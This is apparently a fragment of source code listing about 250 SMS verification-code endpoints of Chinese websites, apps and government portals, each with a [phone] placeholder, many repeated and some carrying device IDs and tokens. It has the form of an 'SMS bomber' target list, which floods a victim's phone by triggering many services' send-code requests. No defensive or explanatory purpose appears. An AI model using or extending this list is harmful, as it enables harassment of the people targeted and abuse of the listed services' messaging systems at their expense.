"https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", + "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", + "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]&platform=2&realVer=3.2.2&region=zh-CN&time_zone=28800&type=0&unlogin_token=724767db76a9c95e817d0101be771480&version_code=138", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", + "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584431770018", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]&smsType=2", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://e.weisns.com.cn/Jsonp/send_mobile_code_reg?callback=jQuery17208124790173017422_1582106551645&mobile=[phone]&token=00-cef055211be84b54a91287fc906bb0d90401bficbagfjjnore2etrosopaqp2rwsslaglw-09fe1fe580b4879abdbabd7ca1f5e26c-5dee0acfe62d2b442088c156&_=1582106605205", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.csti.cn/uums-user-front/api/user/register/phone/send?phone=[phone]", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]=a70ca68498d9489dbe88e141ba49751267896313", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://passport.lotour.com/reg/sendPhoneCode?callback=&_=&mobile=[phone]", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584495050906", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + 